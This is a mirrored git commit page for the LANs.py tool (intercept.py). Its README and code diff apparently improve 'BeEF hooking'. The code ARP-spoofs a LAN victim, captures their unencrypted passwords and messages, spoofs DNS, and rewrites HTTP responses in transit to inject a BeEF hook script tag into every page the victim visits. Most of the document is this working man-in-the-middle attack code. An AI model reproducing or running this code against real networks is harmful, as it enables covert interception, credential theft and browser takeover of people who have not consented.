mirror of
https://github.com/DanMcInerney/LANs.py.git
synced 2025-07-10 07:13:44 -07:00
beef hooking more reliable
This commit is contained in:
parent
c383dcf4b7
commit
f38236290e
2 changed files with 44 additions and 43 deletions
|
@ -3,7 +3,7 @@ intercept
|
||||||
|
|
||||||
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
|
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
|
||||||
|
|
||||||
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted
|
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted, BeEF (option)
|
||||||
|
|
||||||
Example usage as root:
|
Example usage as root:
|
||||||
python intercept.py -u -p -d -ip 192.168.0.10
|
python intercept.py -u -p -d -ip 192.168.0.10
|
||||||
|
@ -37,6 +37,9 @@ python intercept.py -h
|
||||||
|
|
||||||
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
|
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
|
||||||
|
|
||||||
|
-b BEEF_HOOK_URL, copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Cleans the following on Ctrl-C:
|
Cleans the following on Ctrl-C:
|
||||||
|
|
||||||
|
@ -47,6 +50,7 @@ Cleans the following on Ctrl-C:
|
||||||
individually restore each machine's ARP table
|
individually restore each machine's ARP table
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
To do:
|
To do:
|
||||||
|
|
||||||
Add ability to read from pcap file
|
Add ability to read from pcap file
|
||||||
|
|
81
intercept.py
81
intercept.py
|
@ -1,10 +1,6 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
'''
|
'''
|
||||||
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
|
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
|
||||||
Author: Dan McInerney
|
|
||||||
Contact: danhmcinerney gmail
|
|
||||||
|
|
||||||
Prerequisites: Linux
|
Prerequisites: Linux
|
||||||
nmap (optional)
|
nmap (optional)
|
||||||
nbtscan (optional)
|
nbtscan (optional)
|
||||||
|
@ -16,6 +12,13 @@ Prerequisites: Linux
|
||||||
|
|
||||||
Note: This script flushes iptables before and after usage.
|
Note: This script flushes iptables before and after usage.
|
||||||
'''
|
'''
|
||||||
|
__author__ = 'Dan McInerney'
|
||||||
|
__license__ = 'GPL'
|
||||||
|
__email__ = 'danhmcinerney with gmail'
|
||||||
|
__version__ = 1.0
|
||||||
|
|
||||||
|
####################################################################
|
||||||
|
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
|
||||||
|
@ -103,7 +106,7 @@ class Parser():
|
||||||
catch_pkts = 0
|
catch_pkts = 0
|
||||||
full_pkt = ''
|
full_pkt = ''
|
||||||
full_load = ''
|
full_load = ''
|
||||||
drop_load = []
|
drop_body = []
|
||||||
start_time = 0
|
start_time = 0
|
||||||
|
|
||||||
def start(self, payload):
|
def start(self, payload):
|
||||||
|
@ -123,14 +126,6 @@ class Parser():
|
||||||
sport = pkt[TCP].sport
|
sport = pkt[TCP].sport
|
||||||
ack = pkt[TCP].ack
|
ack = pkt[TCP].ack
|
||||||
load = pkt[Raw].load
|
load = pkt[Raw].load
|
||||||
#################################################
|
|
||||||
if sport == 80:
|
|
||||||
# for x in self.drop_load:
|
|
||||||
# if load == x:
|
|
||||||
# payload.set_verdict(nfqueue.NF_DROP)
|
|
||||||
# return
|
|
||||||
self.beef(load, ack, pkt, payload)
|
|
||||||
#################################################
|
|
||||||
mail_ports = [25, 26, 110, 143]
|
mail_ports = [25, 26, 110, 143]
|
||||||
if dport in mail_ports or sport in mail_ports:
|
if dport in mail_ports or sport in mail_ports:
|
||||||
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
|
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
|
||||||
|
@ -140,6 +135,8 @@ class Parser():
|
||||||
self.ftp(load, IP_dst, IP_src)
|
self.ftp(load, IP_dst, IP_src)
|
||||||
if dport == 80 or sport == 80:
|
if dport == 80 or sport == 80:
|
||||||
self.URL(load, ack, dport, sport)
|
self.URL(load, ack, dport, sport)
|
||||||
|
if sport == 80 and args.beef:
|
||||||
|
self.beef(load, ack, pkt, payload)
|
||||||
if args.dnsspoof:
|
if args.dnsspoof:
|
||||||
if pkt.haslayer(DNSQR):
|
if pkt.haslayer(DNSQR):
|
||||||
dport = pkt[UDP].dport
|
dport = pkt[UDP].dport
|
||||||
|
@ -149,36 +146,38 @@ class Parser():
|
||||||
dns_layer = pkt[DNS]
|
dns_layer = pkt[DNS]
|
||||||
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
|
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
|
||||||
|
|
||||||
#################################################
|
|
||||||
def beef(self, load, ack, pkt, payload):
|
def beef(self, load, ack, pkt, payload):
|
||||||
current_time = time.time()
|
heads = 0
|
||||||
############### Maybe test the next packet for having headers. If it does, then block it and inject?
|
try:
|
||||||
if self.catch_pkts == 1 and current_time > self.start_time + 1:
|
headers, body = load.split("\r\n\r\n", 1)
|
||||||
for x in self.drop_load:
|
heads = 1
|
||||||
if load == x:
|
except:
|
||||||
print '[-] load found in drop_load list'
|
pass
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
if self.catch_pkts == 1:
|
||||||
break
|
if heads == 1 or ack != self.oldBEEFack:
|
||||||
self.inject()
|
heads = 0
|
||||||
|
self.catch_pkts = 0
|
||||||
|
self.inject()
|
||||||
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
|
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
|
||||||
self.full_data = self.full_data+load
|
self.full_data = self.full_data+load
|
||||||
print '[+] Added data to the BeEF queue'
|
print '[+] Added data to the BeEF packet'
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
payload.set_verdict(nfqueue.NF_DROP)
|
||||||
return
|
return
|
||||||
if 'Content-Type: text/html' in load and self.catch_pkts == 0:
|
if 'Content-Type: text/html' in load and self.catch_pkts == 0:
|
||||||
self.start_time = time.time()
|
|
||||||
print '[+] HTML packet found, starting BeEF queue'
|
print '[+] HTML packet found, starting BeEF queue'
|
||||||
self.drop_load.append(load)
|
|
||||||
self.oldBEEFack = ack
|
self.oldBEEFack = ack
|
||||||
self.full_pkt = pkt
|
self.full_pkt = pkt
|
||||||
self.full_data = load
|
self.full_data = load
|
||||||
self.server = pkt[IP].src
|
self.server = pkt[IP].src
|
||||||
self.catch_pkts = 1
|
self.catch_pkts = 1
|
||||||
payload.set_verdict(nfqueue.NF_DROP)
|
payload.set_verdict(nfqueue.NF_DROP)
|
||||||
return
|
|
||||||
|
|
||||||
def inject(self):
|
def inject(self):
|
||||||
url = '<script src='+args.beef+'></script> '
|
|
||||||
|
html = '<script src='+args.beef+'></script> '
|
||||||
|
|
||||||
|
body_found = 0
|
||||||
|
|
||||||
if self.full_pkt != '' and self.full_data != '':
|
if self.full_pkt != '' and self.full_data != '':
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -197,27 +196,30 @@ class Parser():
|
||||||
print '[-] Could not decompress body of packet'
|
print '[-] Could not decompress body of packet'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
if '<html' in body:
|
if '<html' in body or '/html>' in body:
|
||||||
psplit = str(body).split('<head>')
|
|
||||||
try:
|
try:
|
||||||
body = psplit[0]+'<head> '+url+psplit[1]
|
psplit = str(body).split('</head>')
|
||||||
|
body = psplit[0]+html+'</head>'+psplit[1]
|
||||||
except:
|
except:
|
||||||
print '[-] <head> not found in load'
|
print '[-] </head> not found in load'
|
||||||
try:
|
try:
|
||||||
psplit = str(body).split('</head>')
|
psplit = str(body).split('<head>')
|
||||||
body = psplit[0]+url+'</head>'+psplit[1]
|
body = psplit[0]+'<head>'+html+psplit[1]
|
||||||
except:
|
except:
|
||||||
print '[-] </head> not found in load'
|
print '[-] Failed to inject html'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
|
# For debugging
|
||||||
|
# fp = open(str(self.oldBEEFack)+'.html', 'wb')
|
||||||
|
# fp.write(headers+"\r\n\r\n"+body)
|
||||||
|
# fp.close
|
||||||
|
|
||||||
# Recompress data if necessary
|
# Recompress data if necessary
|
||||||
if 'Content-Encoding: gzip' in headers:
|
if 'Content-Encoding: gzip' in headers:
|
||||||
try:
|
try:
|
||||||
|
@ -229,7 +231,6 @@ class Parser():
|
||||||
except:
|
except:
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
print '[-] Could not recompress html'
|
print '[-] Could not recompress html'
|
||||||
|
|
||||||
|
@ -239,7 +240,6 @@ class Parser():
|
||||||
print '[-] Could not split headers at Content-Length\n'
|
print '[-] Could not split headers at Content-Length\n'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
return
|
return
|
||||||
httpnewlength = str(len(headers+"\r\n\r\n"+body))
|
httpnewlength = str(len(headers+"\r\n\r\n"+body))
|
||||||
|
@ -250,14 +250,11 @@ class Parser():
|
||||||
del self.full_pkt[IP].chksum
|
del self.full_pkt[IP].chksum
|
||||||
del self.full_pkt[TCP].chksum
|
del self.full_pkt[TCP].chksum
|
||||||
|
|
||||||
catch_pkts = 0
|
|
||||||
send(self.full_pkt)
|
send(self.full_pkt)
|
||||||
print '[!] Sent injected packet'
|
print '[!] Sent injected packet'
|
||||||
self.full_data = ''
|
self.full_data = ''
|
||||||
self.full_pkt = ''
|
self.full_pkt = ''
|
||||||
self.catch_pkts = 0
|
|
||||||
self.oldBEEFack = 0
|
self.oldBEEFack = 0
|
||||||
#################################################
|
|
||||||
|
|
||||||
# Spoof DNS for a specific domain to point to your machine
|
# Spoof DNS for a specific domain to point to your machine
|
||||||
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
|
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue